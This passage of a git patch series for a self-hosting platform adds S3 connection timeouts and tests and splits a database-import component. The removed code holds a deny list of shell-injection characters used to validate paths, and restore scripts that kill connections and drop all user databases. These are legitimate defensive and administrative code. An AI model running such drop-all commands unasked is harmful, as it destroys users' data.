+        if ($message->contains(['timed out', 'timeout', 'connection refused', 'could not resolve', 'curl error 28'])) {
+            return new \RuntimeException(
+                'Could not connect to the S3 endpoint within 15 seconds. Please verify the endpoint, bucket, credentials, region, and network/firewall settings.',
+                previous: $exception,
+            );
+        }
+
+        return $exception;
+    }
 }
diff --git a/tests/Unit/S3StorageTest.php b/tests/Unit/S3StorageTest.php
index 6709f381d..ddf390443 100644
--- a/tests/Unit/S3StorageTest.php
+++ b/tests/Unit/S3StorageTest.php
@@ -1,6 +1,10 @@
 <?php
 
 use App\Models\S3Storage;
+use Illuminate\Support\Facades\Storage;
+use Tests\TestCase;
+
+uses(TestCase::class);
 
 test('S3Storage model has correct cast definitions', function () {
     $s3Storage = new S3Storage;
@@ -45,9 +49,72 @@
     expect($s3Storage->awsUrl())->toBe('https://minio.example.com:9000/backups');
 });
 
-test('S3Storage model is guarded correctly', function () {
+test('S3Storage model fillable attributes are configured correctly', function () {
     $s3Storage = new S3Storage;
 
-    // The model should have $guarded = [] which means everything is fillable
-    expect($s3Storage->getGuarded())->toBe([]);
+    expect($s3Storage->getFillable())->toBe([
+        'name',
+        'description',
+        'region',
+        'key',
+        'secret',
+        'bucket',
+        'endpoint',
+        'is_usable',
+        'unusable_email_sent',
+    ]);
+});
+
+test('S3Storage connection validation uses short s3 client timeouts', function () {
+    $disk = Mockery::mock();
+    $disk->expects('files')->once()->andReturn([]);
+
+    Storage::expects('build')
+        ->once()
+        ->with(Mockery::on(function (array $config) {
+            expect($config['http']['connect_timeout'])->toBe(15);
+            expect($config['http']['timeout'])->toBe(15);
+
+            return true;
+        }))
+        ->andReturn($disk);
+
+    $s3Storage = new S3Storage;
+    $s3Storage->setRawAttributes([
+        'name' => 'Test S3',
+        'region' => 'us-east-1',
+        'key' => null,
+        'secret' => null,
+        'bucket' => 'test-bucket',
+        'endpoint' => 'https://s3.amazonaws.com',
+    ]);
+
+    $s3Storage->testConnection();
+
+    expect($s3Storage->is_usable)->toBeTrue();
+});
+
+test('S3Storage connection validation returns friendly timeout error', function () {
+    $disk = Mockery::mock();
+    $disk->expects('files')
+        ->once()
+        ->andThrow(new RuntimeException('cURL error 28: Operation timed out after 15000 milliseconds'));
+
+    Storage::expects('build')->once()->andReturn($disk);
+
+    $s3Storage = new S3Storage;
+    $s3Storage->setRawAttributes([
+        'name' => 'Test S3',
+        'region' => 'us-east-1',
+        'key' => null,
+        'secret' => null,
+        'bucket' => 'test-bucket',
+        'endpoint' => 'https://s3.amazonaws.com',
+        'unusable_email_sent' => true,
+    ]);
+
+    expect(fn () => $s3Storage->testConnection())
+        ->toThrow(RuntimeException::class, 'Could not connect to the S3 endpoint within 15 seconds.');
+
+    expect($s3Storage->is_usable)->toBeFalse();
 });

From 322bf7c1b2a060873827b83b0a35221f8058dc8d Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 28 May 2026 19:30:12 +0200
Subject: [PATCH 32/90] refactor(database): split import form into Livewire
 child

Extract the database import form into its own component and add realtime
status refresh components for application server badges and service resource
cards.
---
 .../Project/Application/ServerStatusBadge.php |  41 +
 app/Livewire/Project/Database/Import.php      | 853 ++----------------
 app/Livewire/Project/Database/ImportForm.php  | 821 +++++++++++++++++
 app/Livewire/Project/Service/ResourceCard.php |  66 ++
 .../application/configuration.blade.php       |  16 +-
 .../application/server-status-badge.blade.php |  17 +
 .../project/database/import-form.blade.php    | 228 +++++
 .../project/database/import.blade.php         | 237 +----
 .../project/service/configuration.blade.php   | 130 +--
 .../project/service/resource-card.blade.php   |  77 ++
 .../Feature/DatabaseSslStatusRefreshTest.php  |  99 ++
 11 files changed, 1450 insertions(+), 1135 deletions(-)
 create mode 100644 app/Livewire/Project/Application/ServerStatusBadge.php
 create mode 100644 app/Livewire/Project/Database/ImportForm.php
 create mode 100644 app/Livewire/Project/Service/ResourceCard.php
 create mode 100644 resources/views/livewire/project/application/server-status-badge.blade.php
 create mode 100644 resources/views/livewire/project/database/import-form.blade.php
 create mode 100644 resources/views/livewire/project/service/resource-card.blade.php

diff --git a/app/Livewire/Project/Application/ServerStatusBadge.php b/app/Livewire/Project/Application/ServerStatusBadge.php
new file mode 100644
index 000000000..459271e28
--- /dev/null
+++ b/app/Livewire/Project/Application/ServerStatusBadge.php
@@ -0,0 +1,41 @@
+<?php
+
+namespace App\Livewire\Project\Application;
+
+use App\Models\Application;
+use Illuminate\Contracts\View\View;
+use Illuminate\Support\Facades\Auth;
+use Livewire\Component;
+
+class ServerStatusBadge extends Component
+{
+    public Application $application;
+
+    public function getListeners(): array
+    {
+        $user = Auth::user();
+        if (! $user) {
+            return [];
+        }
+
+        $team = $user->currentTeam();
+        if (! $team) {
+            return [];
+        }
+
+        return [
+            "echo-private:team.{$team->id},ServiceStatusChanged" => 'refreshStatus',
+            "echo-private:team.{$team->id},ServiceChecked" => 'refreshStatus',
+        ];
+    }
+
+    public function refreshStatus(): void
+    {
+        $this->application->refresh();
+    }
+
+    public function render(): View
+    {
+        return view('livewire.project.application.server-status-badge');
+    }
+}
diff --git a/app/Livewire/Project/Database/Import.php b/app/Livewire/Project/Database/Import.php
index 304de62ef..ea04658cf 100644
--- a/app/Livewire/Project/Database/Import.php
+++ b/app/Livewire/Project/Database/Import.php
@@ -2,22 +2,14 @@
 
 namespace App\Livewire\Project\Database;
 
-use App\Models\S3Storage;
-use App\Models\Server;
-use App\Models\Service;
 use App\Models\ServiceDatabase;
 use App\Models\StandaloneClickhouse;
 use App\Models\StandaloneDragonfly;
 use App\Models\StandaloneKeydb;
-use App\Models\StandaloneMariadb;
-use App\Models\StandaloneMongodb;
-use App\Models\StandaloneMysql;
-use App\Models\StandalonePostgresql;
 use App\Models\StandaloneRedis;
-use App\Support\ValidationPatterns;
+use Illuminate\Contracts\View\View;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
-use Illuminate\Support\Facades\Storage;
-use Livewire\Attributes\Computed;
+use Illuminate\Support\Facades\Auth;
 use Livewire\Attributes\Locked;
 use Livewire\Component;
 
@@ -25,797 +17,134 @@ class Import extends Component
 {
     use AuthorizesRequests;
 
-    /**
-     * Validate that a string is safe for use as an S3 bucket name.
-     * Allows alphanumerics, dots, dashes, and underscores.
-     */
-    private function validateBucketName(string $bucket): bool
-    {
-        return preg_match('/^[a-zA-Z0-9.\-_]+$/', $bucket) === 1;
-    }
-
-    /**
-     * Validate that a string is safe for use as an S3 path.
-     * Allows alphanumerics, dots, dashes, underscores, slashes, and common file characters.
-     */
-    private function validateS3Path(string $path): bool
-    {
-        // Must not be empty
-        if (empty($path)) {
-            return false;
-        }
-
-        // Must not contain dangerous shell metacharacters or command injection patterns
-        $dangerousPatterns = [
-            '..', // Directory traversal
-            '$(', // Command substitution
-            '`',  // Backtick command substitution
-            '|',  // Pipe
-            ';',  // Command separator
-            '&',  // Background/AND
-            '>',  // Redirect
-            '<',  // Redirect
-            "\n", // Newline
-            "\r", // Carriage return
-            "\0", // Null byte
-            "'",  // Single quote
-            '"',  // Double quote
-            '\\', // Backslash
-        ];
-
-        foreach ($dangerousPatterns as $pattern) {
-            if (str_contains($path, $pattern)) {
-                return false;
-            }
-        }
-
-        // Allow alphanumerics, dots, dashes, underscores, slashes, spaces, plus, equals, at
-        return preg_match('/^[a-zA-Z0-9.\-_\/\s+@=]+$/', $path) === 1;
-    }
-
-    /**
-     * Validate that a string is safe for use as a file path on the server.
-     */
-    private function validateServerPath(string $path): bool
-    {
-        // Must be an absolute path
-        if (! str_starts_with($path, '/')) {
-            return false;
-        }
-
-        // Must not contain dangerous shell metacharacters or command injection patterns
-        $dangerousPatterns = [
-            '..', // Directory traversal
-            '$(', // Command substitution
-            '`',  // Backtick command substitution
-            '|',  // Pipe
-            ';',  // Command separator
-            '&',  // Background/AND
-            '>',  // Redirect
-            '<',  // Redirect
-            "\n", // Newline
-            "\r", // Carriage return
-            "\0", // Null byte
-            "'",  // Single quote
-            '"',  // Double quote
-            '\\', // Backslash
-        ];
-
-        foreach ($dangerousPatterns as $pattern) {
-            if (str_contains($path, $pattern)) {
-                return false;
-            }
-        }
-
-        // Allow alphanumerics, dots, dashes, underscores, slashes, and spaces
-        return preg_match('/^[a-zA-Z0-9.\-_\/\s]+$/', $path) === 1;
-    }
-
-    public bool $unsupported = false;
-
-    // Store IDs instead of models for proper Livewire serialization
     #[Locked]
     public ?int $resourceId = null;
 
     #[Locked]
     public ?string $resourceType = null;
 
-    #[Locked]
-    public ?int $serverId = null;
-
-    // View-friendly properties to avoid computed property access in Blade
-    #[Locked]
-    public string $resourceUuid = '';
-
     public string $resourceStatus = '';
 
-    #[Locked]
-    public string $resourceDbType = '';
+    public string $resourceUuid = '';
 
-    public array $parameters = [];
+    public bool $unsupported = false;
 
-    public array $containers = [];
-
-    public bool $scpInProgress = false;
-
-    public bool $importRunning = false;
-
-    public ?string $filename = null;
-
-    public ?string $filesize = null;
-
-    public bool $isUploading = false;
-
-    public int $progress = 0;
-
-    public bool $error = false;
-
-    #[Locked]
-    public string $container;
-
-    public array $importCommands = [];
-
-    public bool $dumpAll = false;
-
-    public string $restoreCommandText = '';
-
-    public string $customLocation = '';
-
-    public ?int $activityId = null;
-
-    public string $postgresqlRestoreCommand = 'pg_restore -U $POSTGRES_USER -d ${POSTGRES_DB:-${POSTGRES_USER:-postgres}}';
-
-    public string $mysqlRestoreCommand = 'mysql -u $MYSQL_USER -p$MYSQL_PASSWORD $MYSQL_DATABASE';
-
-    public string $mariadbRestoreCommand = 'mariadb -u $MARIADB_USER -p$MARIADB_PASSWORD $MARIADB_DATABASE';
-
-    public string $mongodbRestoreCommand = 'mongorestore --authenticationDatabase=admin --username $MONGO_INITDB_ROOT_USERNAME --password $MONGO_INITDB_ROOT_PASSWORD --uri mongodb://localhost:27017 --gzip --archive=';
-
-    // S3 Restore properties
-    public array $availableS3Storages = [];
-
-    public ?int $s3StorageId = null;
-
-    public string $s3Path = '';
-
-    public ?int $s3FileSize = null;
-
-    #[Computed]
-    public function resource()
+    public function getListeners(): array
     {
-        if ($this->resourceId === null || $this->resourceType === null) {
-            return null;
+        $listeners = ['databaseUpdated' => 'refreshStatus'];
+
+        $user = Auth::user();
+        if (! $user) {
+            return $listeners;
         }
 
-        return $this->resourceType::find($this->resourceId);
-    }
+        $listeners["echo-private:user.{$user->id},DatabaseStatusChanged"] = 'refreshStatus';
 
-    #[Computed]
-    public function server()
-    {
-        if ($this->serverId === null) {
-            return null;
+        $team = $user->currentTeam();
+        if ($team) {
+            $listeners["echo-private:team.{$team->id},ServiceChecked"] = 'refreshStatus';
         }
 
-        return Server::ownedByCurrentTeam()->find($this->serverId);
+        return $listeners;
     }
 
-    protected $listeners = [
-        'slideOverClosed' => 'resetActivityId',
-    ];
-
-    public function resetActivityId()
+    public function mount(): void
     {
-        $this->activityId = null;
-    }
-
-    public function mount()
-    {
-        $this->parameters = get_route_parameters();
-        $this->getContainers();
-        $this->loadAvailableS3Storages();
-    }
-
-    public function updatedDumpAll($value)
-    {
-        $morphClass = $this->resource->getMorphClass();
-
-        // Handle ServiceDatabase by checking the database type
-        if ($morphClass === ServiceDatabase::class) {
-            $dbType = $this->resource->databaseType();
-            if (str_contains($dbType, 'mysql')) {
-                $morphClass = 'mysql';
-            } elseif (str_contains($dbType, 'mariadb')) {
-                $morphClass = 'mariadb';
-            } elseif (str_contains($dbType, 'postgres')) {
-                $morphClass = 'postgresql';
-            }
-        }
-
-        switch ($morphClass) {
-            case StandaloneMariadb::class:
-            case 'mariadb':
-                if ($value === true) {
-                    $this->mariadbRestoreCommand = <<<'EOD'
-for pid in $(mariadb -u root -p$MARIADB_ROOT_PASSWORD -N -e "SELECT id FROM information_schema.processlist WHERE user != 'root';"); do
-  mariadb -u root -p$MARIADB_ROOT_PASSWORD -e "KILL $pid" 2>/dev/null || true
-done && \
-mariadb -u root -p$MARIADB_ROOT_PASSWORD -N -e "SELECT CONCAT('DROP DATABASE IF EXISTS \`',schema_name,'\`;') FROM information_schema.schemata WHERE schema_name NOT IN ('information_schema','mysql','performance_schema','sys');" | mariadb -u root -p$MARIADB_ROOT_PASSWORD && \
-mariadb -u root -p$MARIADB_ROOT_PASSWORD -e "CREATE DATABASE IF NOT EXISTS \`${MARIADB_DATABASE:-default}\`;" && \
-(gunzip -cf $tmpPath 2>/dev/null || cat $tmpPath) | sed -e '/^CREATE DATABASE/d' -e '/^USE \`mysql\`/d' | mariadb -u root -p$MARIADB_ROOT_PASSWORD ${MARIADB_DATABASE:-default}
-EOD;
-                    $this->restoreCommandText = $this->mariadbRestoreCommand.' && (gunzip -cf <temp_backup_file> 2>/dev/null || cat <temp_backup_file>) | mariadb -u root -p$MARIADB_ROOT_PASSWORD ${MARIADB_DATABASE:-default}';
-                } else {
-                    $this->mariadbRestoreCommand = 'mariadb -u $MARIADB_USER -p$MARIADB_PASSWORD $MARIADB_DATABASE';
-                }
-                break;
-            case StandaloneMysql::class:
-            case 'mysql':
-                if ($value === true) {
-                    $this->mysqlRestoreCommand = <<<'EOD'
-for pid in $(mysql -u root -p$MYSQL_ROOT_PASSWORD -N -e "SELECT id FROM information_schema.processlist WHERE user != 'root';"); do
-  mysql -u root -p$MYSQL_ROOT_PASSWORD -e "KILL $pid" 2>/dev/null || true
-done && \
-mysql -u root -p$MYSQL_ROOT_PASSWORD -N -e "SELECT CONCAT('DROP DATABASE IF EXISTS \`',schema_name,'\`;') FROM information_schema.schemata WHERE schema_name NOT IN ('information_schema','mysql','performance_schema','sys');" | mysql -u root -p$MYSQL_ROOT_PASSWORD && \
-mysql -u root -p$MYSQL_ROOT_PASSWORD -e "CREATE DATABASE IF NOT EXISTS \`${MYSQL_DATABASE:-default}\`;" && \
-(gunzip -cf $tmpPath 2>/dev/null || cat $tmpPath) | sed -e '/^CREATE DATABASE/d' -e '/^USE \`mysql\`/d' | mysql -u root -p$MYSQL_ROOT_PASSWORD ${MYSQL_DATABASE:-default}
-EOD;
-                    $this->restoreCommandText = $this->mysqlRestoreCommand.' && (gunzip -cf <temp_backup_file> 2>/dev/null || cat <temp_backup_file>) | mysql -u root -p$MYSQL_ROOT_PASSWORD ${MYSQL_DATABASE:-default}';
-                } else {
-                    $this->mysqlRestoreCommand = 'mysql -u $MYSQL_USER -p$MYSQL_PASSWORD $MYSQL_DATABASE';
-                }
-                break;
-            case StandalonePostgresql::class:
-            case 'postgresql':
-                if ($value === true) {
-                    $this->postgresqlRestoreCommand = <<<'EOD'
-psql -U ${POSTGRES_USER} -c "SELECT pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname IS NOT NULL AND pid <> pg_backend_pid()" && \
-psql -U ${POSTGRES_USER} -t -c "SELECT datname FROM pg_database WHERE NOT datistemplate" | xargs -I {} dropdb -U ${POSTGRES_USER} --if-exists {} && \
-createdb -U ${POSTGRES_USER} ${POSTGRES_DB:-${POSTGRES_USER:-postgres}}
-EOD;
-                    $this->restoreCommandText = $this->postgresqlRestoreCommand.' && (gunzip -cf <temp_backup_file> 2>/dev/null || cat <temp_backup_file>) | psql -U ${POSTGRES_USER} -d ${POSTGRES_DB:-${POSTGRES_USER:-postgres}}';
-                } else {
-                    $this->postgresqlRestoreCommand = 'pg_restore -U ${POSTGRES_USER} -d ${POSTGRES_DB:-${POSTGRES_USER:-postgres}}';
-                }
-                break;
-        }
-
-    }
-
-    public function getContainers()
-    {
-        $this->containers = [];
-        $teamId = data_get(auth()->user()->currentTeam(), 'id');
-
-        // Try to find resource by route parameter
-        $databaseUuid = data_get($this->parameters, 'database_uuid');
-        $stackServiceUuid = data_get($this->parameters, 'stack_service_uuid');
-
-        $resource = null;
-        if ($databaseUuid) {
-            // Standalone database route
-            $resource = getResourceByUuid($databaseUuid, $teamId);
-            if (is_null($resource)) {
-                abort(404);
-            }
-        } elseif ($stackServiceUuid) {
-            // ServiceDatabase route - look up the service database
-            $serviceUuid = data_get($this->parameters, 'service_uuid');
-            $project = currentTeam()
-                ->projects()
-                ->select('id', 'uuid', 'team_id')
-                ->where('uuid', data_get($this->parameters, 'project_uuid'))
-                ->firstOrFail();
-            $environment = $project->environments()
-                ->select('id', 'uuid', 'name', 'project_id')
-                ->where('uuid', data_get($this->parameters, 'environment_uuid'))
-                ->firstOrFail();
-            $service = $environment->services()->whereUuid($serviceUuid)->firstOrFail();
-            $resource = $service->databases()->whereUuid($stackServiceUuid)->first();
-            if (is_null($resource)) {
-                abort(404);
-            }
-        } else {
-            abort(404);
-        }
-
+        $resource = $this->resolveResourceFromRoute();
         $this->authorize('view', $resource);
 
-        // Store IDs for Livewire serialization
         $this->resourceId = $resource->id;
         $this->resourceType = get_class($resource);
 
-        // Store view-friendly properties
+        $this->refreshStatus();
+    }
+
+    public function refreshStatus(): void
+    {
+        $resource = $this->resolveStoredResource();
+        $this->authorize('view', $resource);
+
+        $resource->refresh();
+        $this->resourceUuid = $resource->uuid;
         $this->resourceStatus = $resource->status ?? '';
+        $this->unsupported = $this->isUnsupportedResource($resource);
+    }
 
-        // Handle ServiceDatabase server access differently
-        if ($resource->getMorphClass() === ServiceDatabase::class) {
-            $server = $resource->service?->server;
-            if (! $server) {
-                abort(404, 'Server not found for this service database.');
-            }
-            $this->serverId = $server->id;
-            $this->container = $resource->name.'-'.$resource->service->uuid;
-            $this->resourceUuid = $resource->uuid; // Use ServiceDatabase's own UUID
+    public function render(): View
+    {
+        return view('livewire.project.database.import');
+    }
 
-            // Determine database type for ServiceDatabase
-            $dbType = $resource->databaseType();
-            if (str_contains($dbType, 'postgres')) {
-                $this->resourceDbType = 'standalone-postgresql';
-            } elseif (str_contains($dbType, 'mysql')) {
-                $this->resourceDbType = 'standalone-mysql';
-            } elseif (str_contains($dbType, 'mariadb')) {
-                $this->resourceDbType = 'standalone-mariadb';
-            } elseif (str_contains($dbType, 'mongo')) {
-                $this->resourceDbType = 'standalone-mongodb';
-            } else {
-                $this->resourceDbType = $dbType;
+    private function resolveResourceFromRoute(): object
+    {
+        $parameters = get_route_parameters();
+        $teamId = data_get(Auth::user()?->currentTeam(), 'id');
+        $databaseUuid = data_get($parameters, 'database_uuid');
+        $stackServiceUuid = data_get($parameters, 'stack_service_uuid');
+
+        if ($databaseUuid) {
+            $resource = getResourceByUuid($databaseUuid, $teamId);
+            if ($resource) {
+                return $resource;
             }
-        } else {
-            $server = $resource->destination?->server;
-            if (! $server) {
-                abort(404, 'Server not found for this database.');
-            }
-            $this->serverId = $server->id;
-            $this->container = $resource->uuid;
-            $this->resourceUuid = $resource->uuid;
-            $this->resourceDbType = $resource->type();
+
+            abort(404);
         }
 
-        if (str($resource->status)->startsWith('running')) {
-            $this->containers[] = $this->container;
+        if ($stackServiceUuid) {
+            $project = currentTeam()
+                ->projects()
+                ->select('id', 'uuid', 'team_id')
+                ->where('uuid', data_get($parameters, 'project_uuid'))
+                ->firstOrFail();
+            $environment = $project->environments()
+                ->select('id', 'uuid', 'name', 'project_id')
+                ->where('uuid', data_get($parameters, 'environment_uuid'))
+                ->firstOrFail();
+            $service = $environment->services()->whereUuid(data_get($parameters, 'service_uuid'))->firstOrFail();
+            $resource = $service->databases()->whereUuid($stackServiceUuid)->first();
+            if ($resource) {
+                return $resource;
+            }
         }
 
+        abort(404);
+    }
+
+    private function resolveStoredResource(): object
+    {
+        if ($this->resourceId === null || $this->resourceType === null) {
+            return $this->resolveResourceFromRoute();
+        }
+
+        $resource = $this->resourceType::find($this->resourceId);
+        if ($resource) {
+            return $resource;
+        }
+
+        abort(404);
+    }
+
+    private function isUnsupportedResource(object $resource): bool
+    {
         if (
-            $resource->getMorphClass() === StandaloneRedis::class ||
-            $resource->getMorphClass() === StandaloneKeydb::class ||
-            $resource->getMorphClass() === StandaloneDragonfly::class ||
-            $resource->getMorphClass() === StandaloneClickhouse::class
+            $resource instanceof StandaloneRedis ||
+            $resource instanceof StandaloneKeydb ||
+            $resource instanceof StandaloneDragonfly ||
+            $resource instanceof StandaloneClickhouse
         ) {
-            $this->unsupported = true;
+            return true;
         }
 
-        // Mark unsupported ServiceDatabase types (Redis, KeyDB, etc.)
-        if ($resource->getMorphClass() === ServiceDatabase::class) {
+        if ($resource instanceof ServiceDatabase) {
             $dbType = $resource->databaseType();
-            if (str_contains($dbType, 'redis') || str_contains($dbType, 'keydb') ||
-                str_contains($dbType, 'dragonfly') || str_contains($dbType, 'clickhouse')) {
-                $this->unsupported = true;
-            }
-        }
-    }
 
-    public function checkFile()
-    {
-        if (filled($this->customLocation)) {
-            // Validate the custom location to prevent command injection
-            if (! $this->validateServerPath($this->customLocation)) {
-                $this->dispatch('error', 'Invalid file path. Path must be absolute and contain only safe characters (alphanumerics, dots, dashes, underscores, slashes).');
-
-                return;
-            }
-
-            if (! $this->server) {
-                $this->dispatch('error', 'Server not found. Please refresh the page.');
-
-                return;
-            }
-
-            try {
-                $escapedPath = escapeshellarg($this->customLocation);
-                $result = instant_remote_process(["ls -l {$escapedPath}"], $this->server, throwError: false);
-                if (blank($result)) {
-                    $this->dispatch('error', 'The file does not exist or has been deleted.');
-
-                    return;
-                }
-                $this->filename = $this->customLocation;
-                $this->dispatch('success', 'The file exists.');
-            } catch (\Throwable $e) {
-                return handleError($e, $this);
-            }
-        }
-    }
-
-    public function runImport(string $password = ''): bool|string
-    {
-        if (! verifyPasswordConfirmation($password, $this)) {
-            return 'The provided password is incorrect.';
+            return str_contains($dbType, 'redis') ||
+                str_contains($dbType, 'keydb') ||
+                str_contains($dbType, 'dragonfly') ||
+                str_contains($dbType, 'clickhouse');
         }
 
-        $this->authorize('update', $this->resource);
-
-        if (! ValidationPatterns::isValidContainerName($this->container)) {
-            $this->dispatch('error', 'Invalid container name.');
-
-            return true;
-        }
-
-        if ($this->filename === '') {
-            $this->dispatch('error', 'Please select a file to import.');
-
-            return true;
-        }
-
-        if (! $this->server) {
-            $this->dispatch('error', 'Server not found. Please refresh the page.');
-
-            return true;
-        }
-
-        try {
-            $this->importRunning = true;
-            $this->importCommands = [];
-            $backupFileName = "upload/{$this->resourceUuid}/restore";
-
-            // Check if an uploaded file exists first (takes priority over custom location)
-            if (Storage::exists($backupFileName)) {
-                $path = Storage::path($backupFileName);
-                $tmpPath = '/tmp/'.basename($backupFileName).'_'.$this->resourceUuid;
-                instant_scp($path, $tmpPath, $this->server);
-                Storage::delete($backupFileName);
-                $this->importCommands[] = "docker cp {$tmpPath} {$this->container}:{$tmpPath}";
-            } elseif (filled($this->customLocation)) {
-                // Validate the custom location to prevent command injection
-                if (! $this->validateServerPath($this->customLocation)) {
-                    $this->dispatch('error', 'Invalid file path. Path must be absolute and contain only safe characters.');
-
-                    return true;
-                }
-                $tmpPath = '/tmp/restore_'.$this->resourceUuid;
-                $escapedCustomLocation = escapeshellarg($this->customLocation);
-                $this->importCommands[] = "docker cp {$escapedCustomLocation} {$this->container}:{$tmpPath}";
-            } else {
-                $this->dispatch('error', 'The file does not exist or has been deleted.');
-
-                return true;
-            }
-
-            // Copy the restore command to a script file
-            $scriptPath = "/tmp/restore_{$this->resourceUuid}.sh";
-
-            $restoreCommand = $this->buildRestoreCommand($tmpPath);
-
-            $restoreCommandBase64 = base64_encode($restoreCommand);
-            $this->importCommands[] = "echo \"{$restoreCommandBase64}\" | base64 -d > {$scriptPath}";
-            $this->importCommands[] = "chmod +x {$scriptPath}";
-            $this->importCommands[] = "docker cp {$scriptPath} {$this->container}:{$scriptPath}";
-
-            $this->importCommands[] = "docker exec {$this->container} sh -c '{$scriptPath}'";
-            $this->importCommands[] = "docker exec {$this->container} sh -c 'echo \"Import finished with exit code $?\"'";
-
-            if (! empty($this->importCommands)) {
-                $activity = remote_process($this->importCommands, $this->server, ignore_errors: true, callEventOnFinish: 'RestoreJobFinished', callEventData: [
-                    'scriptPath' => $scriptPath,
-                    'tmpPath' => $tmpPath,
-                    'container' => $this->container,
-                    'serverId' => $this->server->id,
-                ]);
-
-                // Track the activity ID
-                $this->activityId = $activity->id;
-
-                // Dispatch activity to the monitor and open slide-over
-                $this->dispatch('activityMonitor', $activity->id);
-                $this->dispatch('databaserestore');
-            }
-        } catch (\Throwable $e) {
-            handleError($e, $this);
-
-            return true;
-        } finally {
-            $this->filename = null;
-            $this->importCommands = [];
-        }
-
-        return true;
-    }
-
-    public function loadAvailableS3Storages()
-    {
-        try {
-            $this->availableS3Storages = S3Storage::ownedByCurrentTeam(['id', 'name', 'description'])
-                ->where('is_usable', true)
-                ->get()
-                ->map(fn ($s) => ['id' => $s->id, 'name' => $s->name, 'description' => $s->description])
-                ->toArray();
-        } catch (\Throwable $e) {
-            $this->availableS3Storages = [];
-        }
-    }
-
-    public function updatedS3Path($value)
-    {
-        // Reset validation state when path changes
-        $this->s3FileSize = null;
-
-        // Ensure path starts with a slash
-        if ($value !== null && $value !== '') {
-            $this->s3Path = str($value)->trim()->start('/')->value();
-        }
-    }
-
-    public function updatedS3StorageId()
-    {
-        // Reset validation state when storage changes
-        $this->s3FileSize = null;
-    }
-
-    public function checkS3File()
-    {
-        if (! $this->s3StorageId) {
-            $this->dispatch('error', 'Please select an S3 storage.');
-
-            return;
-        }
-
-        if (blank($this->s3Path)) {
-            $this->dispatch('error', 'Please provide an S3 path.');
-
-            return;
-        }
-
-        // Clean the path (remove leading slash if present)
-        $cleanPath = ltrim($this->s3Path, '/');
-
-        // Validate the S3 path early to prevent command injection in subsequent operations
-        if (! $this->validateS3Path($cleanPath)) {
-            $this->dispatch('error', 'Invalid S3 path. Path must contain only safe characters (alphanumerics, dots, dashes, underscores, slashes).');
-
-            return;
-        }
-
-        try {
-            $s3Storage = S3Storage::ownedByCurrentTeam()->findOrFail($this->s3StorageId);
-
-            // Validate bucket name early
-            if (! $this->validateBucketName($s3Storage->bucket)) {
-                $this->dispatch('error', 'Invalid S3 bucket name. Bucket name must contain only alphanumerics, dots, dashes, and underscores.');
-
-                return;
-            }
-
-            // Test connection
-            $s3Storage->testConnection();
-
-            // Build S3 disk configuration
-            $disk = Storage::build([
-                'driver' => 's3',
-                'region' => $s3Storage->region,
-                'key' => $s3Storage->key,
-                'secret' => $s3Storage->secret,
-                'bucket' => $s3Storage->bucket,
-                'endpoint' => $s3Storage->endpoint,
-                'use_path_style_endpoint' => true,
-            ]);
-
-            // Check if file exists
-            if (! $disk->exists($cleanPath)) {
-                $this->dispatch('error', 'File not found in S3. Please check the path.');
-
-                return;
-            }
-
-            // Get file size
-            $this->s3FileSize = $disk->size($cleanPath);
-
-            $this->dispatch('success', 'File found in S3. Size: '.formatBytes($this->s3FileSize));
-        } catch (\Throwable $e) {
-            $this->s3FileSize = null;
-
-            return handleError($e, $this);
-        }
-    }
-
-    public function restoreFromS3(string $password = ''): bool|string
-    {
-        if (! verifyPasswordConfirmation($password, $this)) {
-            return 'The provided password is incorrect.';
-        }
-
-        $this->authorize('update', $this->resource);
-
-        if (! ValidationPatterns::isValidContainerName($this->container)) {
-            $this->dispatch('error', 'Invalid container name.');
-
-            return true;
-        }
-
-        if (! $this->s3StorageId || blank($this->s3Path)) {
-            $this->dispatch('error', 'Please select S3 storage and provide a path first.');
-
-            return true;
-        }
-
-        if (is_null($this->s3FileSize)) {
-            $this->dispatch('error', 'Please check the file first by clicking "Check File".');
-
-            return true;
-        }
-
-        if (! $this->server) {
-            $this->dispatch('error', 'Server not found. Please refresh the page.');
-
-            return true;
-        }
-
-        try {
-            $this->importRunning = true;
-
-            $s3Storage = S3Storage::ownedByCurrentTeam()->findOrFail($this->s3StorageId);
-
-            $key = $s3Storage->key;
-            $secret = $s3Storage->secret;
-            $bucket = $s3Storage->bucket;
-            $endpoint = $s3Storage->endpoint;
-
-            // Validate bucket name to prevent command injection
-            if (! $this->validateBucketName($bucket)) {
-                $this->dispatch('error', 'Invalid S3 bucket name. Bucket name must contain only alphanumerics, dots, dashes, and underscores.');
-
-                return true;
-            }
-
-            // Clean the S3 path
-            $cleanPath = ltrim($this->s3Path, '/');
-
-            // Validate the S3 path to prevent command injection
-            if (! $this->validateS3Path($cleanPath)) {
-                $this->dispatch('error', 'Invalid S3 path. Path must contain only safe characters (alphanumerics, dots, dashes, underscores, slashes).');
-
-                return true;
-            }
-
-            // Get helper image
-            $helperImage = config('constants.coolify.helper_image');
-            $latestVersion = getHelperVersion();
-            $fullImageName = "{$helperImage}:{$latestVersion}";
-
-            // Get the database destination network
-            if ($this->resource->getMorphClass() === ServiceDatabase::class) {
-                $destinationNetwork = $this->resource->service->destination->network ?? 'coolify';
-            } else {
-                $destinationNetwork = $this->resource->destination->network ?? 'coolify';
-            }
-
-            // Generate unique names for this operation
-            $containerName = "s3-restore-{$this->resourceUuid}";
-            $helperTmpPath = '/tmp/'.basename($cleanPath);
-            $serverTmpPath = "/tmp/s3-restore-{$this->resourceUuid}-".basename($cleanPath);
-            $containerTmpPath = "/tmp/restore_{$this->resourceUuid}-".basename($cleanPath);
-            $scriptPath = "/tmp/restore_{$this->resourceUuid}.sh";
-
-            // Prepare all commands in sequence
-            $commands = [];
-
-            // 1. Clean up any existing helper container and temp files from previous runs
-            $commands[] = "docker rm -f {$containerName} 2>/dev/null || true";
-            $commands[] = "rm -f {$serverTmpPath} 2>/dev/null || true";
-            $commands[] = "docker exec {$this->container} rm -f {$containerTmpPath} {$scriptPath} 2>/dev/null || true";
-
-            // 2. Start helper container on the database network
-            $commands[] = "docker run -d --network {$destinationNetwork} --name {$containerName} {$fullImageName} sleep 3600";
-
-            // 3. Configure S3 access in helper container
-            $escapedEndpoint = escapeshellarg($endpoint);
-            $escapedKey = escapeshellarg($key);
-            $escapedSecret = escapeshellarg($secret);
-            $commands[] = "docker exec {$containerName} mc alias set s3temp {$escapedEndpoint} {$escapedKey} {$escapedSecret}";
-
